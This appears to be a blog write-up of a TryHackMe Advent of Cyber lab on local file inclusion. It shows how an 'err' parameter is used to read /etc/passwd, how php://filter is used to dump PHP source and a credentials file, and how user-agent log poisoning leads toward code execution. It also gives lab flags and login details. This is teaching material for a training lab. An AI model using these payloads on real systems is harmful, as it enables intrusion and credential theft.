-->

  • TryHackMe Web Exploitation Patch Management Is Hard

     

     

    TryHackMe Web Exploitation Patch Management Is Hard

     

     

    Get started with Cyber Security in 25 days, by learning the basics and completing a new, beginner friendly security exercise every day leading up until Christmas; an advent calendar but with security challenges and not chocolate.


    Hey Guys! Sorry for the delay but, we are back with Day 6 of the “ Advent of Cyber” event by TryHackMe. If you haven’t solved the Day 5 challenge click here.


    This challenge is again based on Web Exploitation and the task is named


    Patch Management is Hard


    DAY 6

    Story


    During a routine security audit before the Incident, McSkidy discovered some recovery passwords on an old server. She created a ticket to decommission this server to reduce this security vulnerability. The Elf assigned to fix this vulnerability kept pushing off the task, and this never got done. Luckily, some of those recovery keys can be used to save some systems.

    Unfortunately, the only way to access the server is through an old web application. See if you can pull out those recovery keys to help McSkidy with her pursuit to save Christmas.



    Learning Objectives of the day


    1.     What is LFI?
    2.     How to perform LFI?
    3.     How to elevate from LFI to RCE?


    Let us understand the concepts targeted for today first!




    What is LFI?


    An LFI vulnerability is found in various web applications. As an example, in the PHP, the following functions cause this kind of vulnerability:


    1.     include
    2.     require
    3.     include_once
    4.     require_once


        
        

    It is a web application vulnerability that allows the attacker to include and read local files on the server. These files could contain sensitive data such as cryptographic keys, databases that contain passwords, and other private data. An LFI vulnerability happens due to a developer’s lack of security awareness. In some cases, developers need to include the content of other local files within a specific page. Suppose a developer includes files without proper input validation. In that case, the LFI vulnerability will exist as a developer should never trust user input and keep all inputs from users to be filtered and sanitized. The main issue of these vulnerabilities is the lack of input validation, in which the user inputs are not sanitized or validated, and the user controls them.


    You should read the content given with the challenge for the best understanding of LFI



    Q1.Deploy the attached VM and look around. What is the entry point for our web application?

     


    TryHackMe Web Exploitation Patch Management Is Hard



    Ans :- err


    Q2.Use the entry point to perform LFI to read the /etc/flag file. What is the flag?

    We first go to our entry point and replace the error.txt file with ‘/etc/passwd’ file just to check if we can get it!


    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false 
    
    
    




    Yes we have access, but normally we shouldn’t have that!


    TryHackMe Web Exploitation Patch Management Is Hard



    Now we check for /etc/flag and voila!



    Ans :- THM{d29e08941cf7fe41df55f1a7da6c4c06}



    Q3.Use the PHP filter technique to read the source code of the index.php. What is the $flag variable’s value?

    We use the PHP filter technique to read the code for index.php by using :

    php://filter/convert.base64-encode/resource=

    https://10-10-247-133.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=index.php
    



    TryHackMe Web Exploitation Patch Management Is Hard



    Once we find the base64 encoding for it, we go to https://www.base64decode.org/ and decode it for our answer!

    Or

    You can use the base64 command in terminal...


    echo "aplhanumeric character" | base64 -d


    echo "PD9waHAgc2Vzc2lvbl9zdGFydCgpOwokZmxhZyA9ICJUSE17NzkxZDQzZDQ2MDE4YTBkODkzNjFkYmY2MGQ1ZDllYjh9IjsKaW5jbHVkZSgiLi9pbmNsdWRlcy9jcmVkcy5waHAiKTsKaWYoJF9TRVNTSU9OWyd1c2VybmFtZSddID09PSAkVVNFUil7ICAgICAgICAgICAgICAgICAgICAgICAgCgloZWFkZXIoICdMb2NhdGlvbjogbWFuYWdlLnBocCcgKTsKCWRpZSgpOwp9IGVsc2UgewoJJGxhYk51bSA9ICIiOwogIHJlcXVpcmUgIi4vaW5jbHVkZXMvaGVhZGVyLnBocCI7Cj8+CjxkaXYgY2xhc3M9InJvdyI+CiAgPGRpdiBjbGFzcz0iY29sLWxnLTEyIj4KICA8L2Rpdj4KICA8ZGl2IGNsYXNzPSJjb2wtbGctOCBjb2wtb2Zmc2V0LTEiPgogICAgICA8P3BocCBpZiAoaXNzZXQoJGVycm9yKSkgeyA/PgogICAgICAgICAgPHNwYW4gY2xhc3M9InRleHQgdGV4dC1kYW5nZXIiPjxiPjw/cGhwIGVjaG8gJGVycm9yOyA/PjwvYj48L3NwYW4+CiAgICAgIDw/cGhwIH0KCj8+CiA8cD5XZWxjb21lIDw/cGhwIGVjaG8gZ2V0VXNlck5hbWUoKTsgPz48L3A+Cgk8ZGl2IGNsYXNzPSJhbGVydCBhbGVydC1kYW5nZXIiIHJvbGU9ImFsZXJ0Ij5UaGlzIHNlcnZlciBoYXMgc2Vuc2l0aXZlIGluZm9ybWF0aW9uLiBOb3RlIEFsbCBhY3Rpb25zIHRvIHRoaXMgc2VydmVyIGFyZSBsb2dnZWQgaW4hPC9kaXY+IAoJPC9kaXY+Cjw/cGhwIGlmKCRlcnJJbmNsdWRlKXsgaW5jbHVkZSgkX0dFVFsnZXJyJ10pO30gPz4KPC9kaXY+Cgo8P3BocAp9Cj8+</div>" | base64 -d
    



    TryHackMe Web Exploitation Patch Management Is Hard


    Answer :-  THM{791d43d46018a0d89361dbf60d5d9eb8}


    Q4.McSkidy forgot his login credential. Can you help him to login in order to recover one of the server’s passwords?


    Now that you read the index.php, there is a login credential PHP file’s path. Use the PHP filter technique to read its content. What are the username and password?


    Using the same base64 encoding of index.php file, we also see that there is ./includes/creds.php which has the credentials.



    https://10-10-231-193.p.thmlabs.com/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php
    
    


    TryHackMe Web Exploitation Patch Management Is Hard


    We do the same process and use the PHP filter process to go to this file and then decode it and get the credentials!



    TryHackMe Web Exploitation Patch Management Is Hard



    Answer:- McSkidy:A0C315Aw3s0m




    Q5.Use the credentials to login into the web application. Help McSkidy to recover the server’s password. What is the password of the flag.thm.aoc server?

    We have the username and password, we login and we see a fe options!


    TryHackMe Web Exploitation Patch Management Is Hard



    We know we have to recover the password, so we go on password recovery



    TryHackMe Web Exploitation Patch Management Is Hard


    Answer:- THM{552f313b52e3c3dbf5257d8c6db7f6f1}


    Q6.The web application logs all users’ requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.

    We send in a CURL command in order to test the logs and see how it shows.


    curl -A "TESTIN TESTING" http://10-10-88-123.p.thmlabs.com/login.php

    the “-A” option helps us set the User Agent and we see TESTIN TESTING as user agent


    Now, we do the same, instead with a little php payload to display the phpinfo!



    TryHackMe Web Exploitation Patch Management Is Hard


    Now to check the log file we need to go to “./includes/logs/app_access.log”, but, for that, we need to go to another window where we a re not logged in to actually check it!


    And we see the PHP info file in the logs!!!!!

    We can see the hostname directly in the phpinfo in the System column

    Answer:- lfi-aoc-awesome-59aedca683fff9261263bb084880c965


    The question does ask for RCE, but the this task can be completed without RCE!



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     


  • 0 comments:

    Post a Comment

    For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.